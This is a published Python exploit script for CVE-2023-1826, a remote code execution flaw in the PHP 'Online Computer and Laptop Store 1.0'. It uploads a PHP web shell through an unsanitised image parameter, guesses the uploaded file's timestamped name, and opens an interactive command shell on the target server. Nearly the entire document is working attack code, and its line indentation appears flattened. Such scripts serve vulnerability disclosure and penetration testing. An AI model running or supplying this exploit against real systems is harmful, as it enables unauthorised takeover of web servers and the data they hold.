#!/usr/bin/env python3
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
# Date: 09/04/2023
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip
# Version: 1.0
# Tested on: Debian 11.6
# CVE : CVE-2023-1826
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone
def interactiveShell(fileUrl: str):
print("Entering pseudo-shell. Type 'exit' to quit")
while True:
command = input("\n$ ")
if command == "exit":
break
response = requests.get(f"{fileUrl}?cmd={command}")
print(response.text)
def uploadFile(url: str, filename: str, content):
endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"
file = {"img": (filename, content)}
response = requests.post(endpoint, files=file)
return response
def getUploadedFileUrl(url: str, filename: str):
timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes
epoch = int(timeNow.timestamp()) # Time in milliseconds
possibleFilename = f"{epoch}_{filename}"
fileUrl = f"{url}/uploads/{possibleFilename}"
response = requests.get(fileUrl)
if response.status_code == 200:
return fileUrl
def exploit(url: str):
filename = str(uuid4()) + ".php"
content = "<?php system($_GET['cmd'])?>"
response = uploadFile(url, filename, content)
if response.status_code != 200:
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")
uploadedUrl = getUploadedFileUrl(url, filename)
if uploadedUrl == None:
print("Error. Could not find the uploaded file.")
exit(1)
print(f"Uploaded file is at {uploadedUrl}")
try:
interactiveShell(uploadedUrl)
except KeyboardInterrupt:
pass
print("\nQuitting.")
def getWebsiteURL(url: str):
if not url.startswith("http"):
url = "http://" + url
if url.endswith("/"):
url = url[:-1]
return url
def main():
parser = ArgumentParser(description="Exploit for CVE-2023-1826")
parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")
args = parser.parse_args()
url = getWebsiteURL(args.url)
exploit(url)
if __name__ == "__main__":
main()